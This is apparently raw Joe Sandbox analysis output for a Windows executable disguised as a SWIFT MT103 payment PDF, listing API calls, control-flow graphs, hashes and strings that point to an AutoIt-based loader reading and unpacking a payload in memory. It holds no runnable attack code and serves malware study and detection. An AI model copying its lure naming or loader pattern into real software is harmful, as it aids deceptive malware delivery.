                                                        • LoadIconW.USER32(?,00000063), ref: 0041021F
                                                        • LoadIconW.USER32(?,000000A4), ref: 00410232
                                                        • LoadIconW.USER32(?,000000A2), ref: 00410245
                                                        • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                        • RegisterClassExW.USER32 ref: 004102C6
                                                          • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                          • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                          • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                          • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                          • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                          • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                          • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00932288,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                        • String ID: #$0$PGH
                                                        • API String ID: 423443420-3673556320
                                                        • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                        • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                        • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                        • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99

                                                        Control-flow Graph

                                                        APIs
                                                        • _fseek.LIBCMT ref: 004525DA
                                                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                          • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                          • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                        • __fread_nolock.LIBCMT ref: 00452618
                                                        • __fread_nolock.LIBCMT ref: 00452629
                                                        • __fread_nolock.LIBCMT ref: 00452644
                                                        • __fread_nolock.LIBCMT ref: 00452661
                                                        • _fseek.LIBCMT ref: 0045267D
                                                        • _malloc.LIBCMT ref: 00452689
                                                        • _malloc.LIBCMT ref: 00452696
                                                        • __fread_nolock.LIBCMT ref: 004526A7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                        • String ID:
                                                        • API String ID: 1911931848-0
                                                        • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                        • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                        • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                        • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1574 40f450-40f45c call 425210 1577 40f460-40f478 1574->1577 1577->1577 1578 40f47a-40f4a8 call 413990 call 410f70 1577->1578 1583 40f4b0-40f4d1 call 4151b0 1578->1583 1586 40f531 1583->1586 1587 40f4d3-40f4da 1583->1587 1588 40f536-40f540 1586->1588 1589 40f4dc-40f4de 1587->1589 1590 40f4fd-40f517 call 41557c 1587->1590 1591 40f4e0-40f4e2 1589->1591 1594 40f51c-40f51f 1590->1594 1593 40f4e6-40f4ed 1591->1593 1595 40f521-40f52c 1593->1595 1596 40f4ef-40f4f2 1593->1596 1594->1583 1597 40f543-40f54e 1595->1597 1598 40f52e-40f52f 1595->1598 1599 42937a-4293a0 call 41557c call 4151b0 1596->1599 1600 40f4f8-40f4fb 1596->1600 1601 40f550-40f553 1597->1601 1602 40f555-40f560 1597->1602 1598->1596 1610 4293a5-4293c3 call 4151d0 1599->1610 1600->1590 1600->1591 1601->1596 1604 429372 1602->1604 1605 40f566-40f571 1602->1605 1604->1599 1608 429361-429367 1605->1608 1609 40f577-40f57a 1605->1609 1608->1593 1611 42936d 1608->1611 1609->1596 1610->1588 1611->1604
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock_fseek_strcat
                                                        • String ID: AU3!$EA06
                                                        • API String ID: 3818483258-2658333250
                                                        • Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                        • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                                                        • Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                        • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1614 410130-410142 SHGetMalloc 1615 410148-410158 SHGetDesktopFolder 1614->1615 1616 42944f-429459 call 411691 1614->1616 1617 4101d1-4101e0 1615->1617 1618 41015a-410188 call 411691 1615->1618 1617->1616 1624 4101e6-4101ee 1617->1624 1626 4101c5-4101ce 1618->1626 1627 41018a-4101a1 SHGetPathFromIDListW 1618->1627 1626->1617 1628 4101a3-4101b1 call 411691 1627->1628 1629 4101b4-4101c0 1627->1629 1628->1629 1629->1626
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$DesktopFolderFromListMallocPath
                                                        • String ID: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe
                                                        • API String ID: 192938534-3574883894
                                                        • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                        • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                        • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                        • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1632 401230-40123b 1633 401241-401272 call 4131f0 call 401be0 1632->1633 1634 4012c5-4012cd 1632->1634 1639 401274-401292 1633->1639 1640 4012ae-4012bf KillTimer SetTimer 1633->1640 1641 42aa61-42aa67 1639->1641 1642 401298-40129c 1639->1642 1640->1634 1645 42aa8b-42aaa7 Shell_NotifyIconW 1641->1645 1646 42aa69-42aa86 Shell_NotifyIconW 1641->1646 1643 4012a2-4012a8 1642->1643 1644 42aaac-42aab3 1642->1644 1643->1640 1649 42aaf8-42ab15 Shell_NotifyIconW 1643->1649 1647 42aad7-42aaf3 Shell_NotifyIconW 1644->1647 1648 42aab5-42aad2 Shell_NotifyIconW 1644->1648 1645->1640 1646->1640 1647->1640 1648->1640 1649->1640
                                                        APIs
                                                        • _memset.LIBCMT ref: 00401257
                                                          • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                                          • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                                          • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                                          • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                        • KillTimer.USER32(?,?), ref: 004012B0
                                                        • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                        • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                        • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                        • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                        • String ID:
                                                        • API String ID: 1792922140-0
                                                        • Opcode ID: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                        • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                        • Opcode Fuzzy Hash: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                        • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1650 3f23ab8-3f23b66 call 3f21478 1653 3f23b6d-3f23b93 call 3f249c8 CreateFileW 1650->1653 1656 3f23b95 1653->1656 1657 3f23b9a-3f23baa 1653->1657 1658 3f23ce5-3f23ce9 1656->1658 1665 3f23bb1-3f23bcb VirtualAlloc 1657->1665 1666 3f23bac 1657->1666 1659 3f23d2b-3f23d2e 1658->1659 1660 3f23ceb-3f23cef 1658->1660 1662 3f23d31-3f23d38 1659->1662 1663 3f23cf1-3f23cf4 1660->1663 1664 3f23cfb-3f23cff 1660->1664 1667 3f23d3a-3f23d45 1662->1667 1668 3f23d8d-3f23da2 1662->1668 1663->1664 1669 3f23d01-3f23d0b 1664->1669 1670 3f23d0f-3f23d13 1664->1670 1671 3f23bd2-3f23be9 ReadFile 1665->1671 1672 3f23bcd 1665->1672 1666->1658 1673 3f23d47 1667->1673 1674 3f23d49-3f23d55 1667->1674 1675 3f23db2-3f23dba 1668->1675 1676 3f23da4-3f23daf VirtualFree 1668->1676 1669->1670 1677 3f23d23 1670->1677 1678 3f23d15-3f23d1f 1670->1678 1679 3f23bf0-3f23c30 VirtualAlloc 1671->1679 1680 3f23beb 1671->1680 1672->1658 1673->1668 1683 3f23d57-3f23d67 1674->1683 1684 3f23d69-3f23d75 1674->1684 1676->1675 1677->1659 1678->1677 1681 3f23c32 1679->1681 1682 3f23c37-3f23c52 call 3f24c18 1679->1682 1680->1658 1681->1658 1690 3f23c5d-3f23c67 1682->1690 1686 3f23d8b 1683->1686 1687 3f23d82-3f23d88 1684->1687 1688 3f23d77-3f23d80 1684->1688 1686->1662 1687->1686 1688->1686 1691 3f23c9a-3f23cae call 3f24a28 1690->1691 1692 3f23c69-3f23c98 call 3f24c18 1690->1692 1698 3f23cb2-3f23cb6 1691->1698 1699 3f23cb0 1691->1699 1692->1690 1700 3f23cc2-3f23cc6 1698->1700 1701 3f23cb8-3f23cbc CloseHandle 1698->1701 1699->1658 1702 3f23cd6-3f23cdf 1700->1702 1703 3f23cc8-3f23cd3 VirtualFree 1700->1703 1701->1700 1702->1653 1702->1658 1703->1702
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03F23B89
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03F23DAF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1717761214.0000000003F21000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F21000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_3f21000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFreeVirtual
                                                        • String ID:
                                                        • API String ID: 204039940-0
                                                        • Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                        • Instruction ID: 25df851e6fd9803077d9f42f067ac043db61abd261dd31a0a486287b6879d8f4
                                                        • Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                        • Instruction Fuzzy Hash: 14A12BB5E00219EBDB14CFA4C894BEEBBB5FF48304F24819AE505BB280D7799A41CF54

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1704 414f10-414f2c 1705 414f4f 1704->1705 1706 414f2e-414f31 1704->1706 1708 414f51-414f55 1705->1708 1706->1705 1707 414f33-414f35 1706->1707 1709 414f37-414f46 call 417f23 1707->1709 1710 414f56-414f5b 1707->1710 1721 414f47-414f4c call 417ebb 1709->1721 1712 414f6a-414f6d 1710->1712 1713 414f5d-414f68 1710->1713 1716 414f7a-414f7c 1712->1716 1717 414f6f-414f77 call 4131f0 1712->1717 1713->1712 1715 414f8b-414f9e 1713->1715 1719 414fa0-414fa6 1715->1719 1720 414fa8 1715->1720 1716->1709 1718 414f7e-414f89 1716->1718 1717->1716 1718->1709 1718->1715 1723 414faf-414fb1 1719->1723 1720->1723 1721->1705 1726 4150a1-4150a4 1723->1726 1727 414fb7-414fbe 1723->1727 1726->1708 1729 414fc0-414fc5 1727->1729 1730 415004-415007 1727->1730 1729->1730 1733 414fc7 1729->1733 1731 415071-415072 call 41e6b1 1730->1731 1732 415009-41500d 1730->1732 1739 415077-41507b 1731->1739 1735 41500f-415018 1732->1735 1736 41502e-415035 1732->1736 1737 415102 1733->1737 1738 414fcd-414fd1 1733->1738 1740 415023-415028 1735->1740 1741 41501a-415021 1735->1741 1743 415037 1736->1743 1744 415039-41503c 1736->1744 1742 415106-41510f 1737->1742 1745 414fd3 1738->1745 1746 414fd5-414fd8 1738->1746 1739->1742 1747 415081-415085 1739->1747 1748 41502a-41502c 1740->1748 1741->1748 1742->1708 1743->1744 1749 415042-41504e call 41453a call 41ed9e 1744->1749 1750 4150d5-4150d9 1744->1750 1745->1746 1751 4150a9-4150af 1746->1751 1752 414fde-414fff call 41ee9b 1746->1752 1747->1750 1753 415087-415096 1747->1753 1748->1744 1772 415053-415058 1749->1772 1758 4150eb-4150fd call 417f23 1750->1758 1759 4150db-4150e8 call 4131f0 1750->1759 1754 4150b1-4150bd call 4131f0 1751->1754 1755 4150c0-4150d0 call 417f23 1751->1755 1761 415099-41509b 1752->1761 1753->1761 1754->1755 1755->1721 1758->1721 1759->1758 1761->1726 1761->1727 1773 415114-415118 1772->1773 1774 41505e-415061 1772->1774 1773->1742 1774->1737 1775 415067-41506f 1774->1775 1775->1761
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                        • String ID:
                                                        • API String ID: 3886058894-0
                                                        • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                        • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                                                        • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                        • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99
                                                        APIs
                                                        • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                        • _memset.LIBCMT ref: 00401C62
                                                        • _wcsncpy.LIBCMT ref: 00401CA1
                                                        • _wcscpy.LIBCMT ref: 00401CBD
                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                        • String ID: Line:
                                                        • API String ID: 1620655955-1585850449
                                                        • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                        • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                        • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                        • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B
                                                        APIs
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                        • ShowWindow.USER32(?,00000000), ref: 00410454
                                                        • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateShow
                                                        • String ID: AutoIt v3$edit
                                                        • API String ID: 1584632944-3779509399
                                                        • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                        • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                        • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                        • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C
                                                        APIs
                                                          • Part of subcall function 03F23718: Sleep.KERNELBASE(000001F4), ref: 03F23729
                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03F2399C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1717761214.0000000003F21000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F21000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_3f21000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CreateFileSleep
                                                        • String ID: DXB56PLO6GXJ2NNLMH3OTQXO4TVRVU
                                                        • API String ID: 2694422964-2353347253
                                                        • Opcode ID: 1c49a877ddb7b103cde87306a1999e5c0c88c60b3fcfe8ddb91e753c7484af39
                                                        • Instruction ID: 7de1beea73d4c01929aaf70621eefbc2aa01a8219654699fdfc49778f0e97515
                                                        • Opcode Fuzzy Hash: 1c49a877ddb7b103cde87306a1999e5c0c88c60b3fcfe8ddb91e753c7484af39
                                                        • Instruction Fuzzy Hash: 6D71B174D0429CDAEF11DBA4C844BEEBFB5AF19304F044199D258BB2C0D7BA0B49CB66
                                                        APIs
                                                        • __lock.LIBCMT ref: 00413AA6
                                                          • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                          • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                          • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                        • ___sbh_find_block.LIBCMT ref: 00413AB1
                                                        • ___sbh_free_block.LIBCMT ref: 00413AC0
                                                        • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                        • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 2714421763-0
                                                        • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                        • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                                                        • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                        • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
                                                        APIs
                                                          • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                                                          • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                                                          • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                                                        • _strcat.LIBCMT ref: 0040F603
                                                          • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                                                          • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                                        • String ID: HH
                                                        • API String ID: 1194219731-2761332787
                                                        • Opcode ID: dda62e46bfe726ec08d2da4edb305482c5d49b6a6c5c86b03ff1868783609ec0
                                                        • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
